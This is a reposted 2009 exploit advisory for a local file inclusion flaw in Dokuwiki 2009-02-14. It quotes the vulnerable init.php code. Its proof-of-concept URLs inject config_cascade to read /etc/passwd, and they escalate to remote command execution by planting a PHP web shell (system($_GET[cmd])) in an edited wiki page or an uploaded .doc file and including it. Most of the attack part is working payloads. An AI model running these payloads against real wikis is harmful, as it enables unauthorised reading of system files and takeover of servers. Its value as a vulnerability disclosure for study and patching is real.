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Dokuwiki 2009-02-14 Local File Inclusion Vulnerability
来源:vfocus.net 作者:vfocus 发布时间:2009-05-27  
# Author_		girex
# Homepage_		girex.altervista.org

# CMS_			Dokuwiki
# Homepage_		dokuwiki.org

# Affected versions_	2009-02-14

# Bug_			Local file inclusion
# Need_			register_globals = On

# Vuln description_
# File:	/inc/init.php

  // if available load a preload config file
  $preload = fullpath(dirname(__FILE__)).'/preload.php';
  if (@file_exists($preload)) include($preload);


  //set the configuration cascade - but only if its not already been set in preload.php
  global $config_cascade;
  if (empty($config_cascade)) {
    $config_cascade = array(
      'main' => array(
        'default'   => array(DOKU_CONF.'dokuwiki.php'),
        'local'     => array(DOKU_CONF.'local.php'),
        'protected' => array(DOKU_CONF.'local.protected.php'),

  // load the global config file(s)
  foreach (array('default','local','protected') as $config_group) {
    if (empty($config_cascade['main'][$config_group])) continue;
    foreach ($config_cascade['main'][$config_group] as $config_file) {
      if (@file_exists($config_file)) {

# File preload.php doesn't exists. (so seems for the affected versions)
# So we can set $config_cascade arrays via register globals
# It's not a RFI couse use of file_exists function.

# First of all you can check the dokuwiki's version here:
# /[host]/[path]/VERSION
# and check if it's a vulnerable version

# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=/etc/passwd
# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./README

# Note:
# You can obtain a remote command execution if you can edit the content of a page
# Just insert your php code into it like: <?php system($_GET[cmd]); ?>
# And include it:

# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./data/pages/[page_edited].txt

# Or you can check if you have permissions to upload file via:
# [host]/[path]/lib/exe/mediamanager.php

# If so, upload your file with .doc extension then include it:

# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./data/media/[uploaded_file].doc

# [2009-05-26]

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